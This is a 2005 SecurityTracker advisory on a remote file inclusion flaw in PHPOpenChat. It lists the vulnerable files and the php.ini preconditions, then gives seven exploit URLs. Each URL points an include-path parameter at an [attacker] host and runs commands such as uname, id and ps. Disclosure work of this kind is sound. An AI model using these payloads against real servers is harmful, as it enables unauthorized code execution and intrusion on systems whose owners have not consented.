SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Instant Messaging/IRC/Chat)  >   PHPOpenChat Vendors:   phpopenchat.org
PHPOpenChat Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1013434
SecurityTracker URL:  http://securitytracker.com/id/1013434
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 16 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.0.1 and prior versions
Description:   Mafia_Boy from Albania Security Clan reported an include file vulnerability in PHPOpenChat. A remote user can execute arbitrary commands on the target system.

A flaw resides in '/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php', where the 'extension.inc' file is included relative to the 'phpbb_root_path' parameter value. A remote user can supply a specially crafted URL to cause the target server to include and execute arbitrary PHP code from a remote system. The PHP code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps

Similar flaws exist in '/phpopenchat/contrib/phpbb/poc.php', '/phpopenchat/contrib/phpnuke/ENGLISH_poc.php', '/phpopenchat/contrib/phpnuke/poc.php', and '/phpopenchat/contrib/yabbse/poc.php'.

Some demonstration exploit URLs are provided:

http://[target]/phpopenchat/contrib/phpbb/poc.php?phpbb_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/phpbb/poc.php?poc_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/yabbse/poc.php?poc_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps

If the 'register_globals' and 'allow_url_fopen' options are set to 'on' in the 'php.ini' configuration file, then a remote user can exploit these vulnerabilities.

The vendor has been notified.

The original advisory is availble at:

http://www.albanianhaxorz.org/advisory/phpopenchaten.txt

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  phpopenchat.org/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiples vulnerability in PHPOpenChat (File Inclusion Vulnerability)


http://www.albanianhaxorz.org/advisory/phpopenchaten.txt

www.albanianhaxorz.org | irc.gigachat.net -j #ASC
ALBANIA SECURITY CLAN, ALBANIAN RULEZZZ.
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC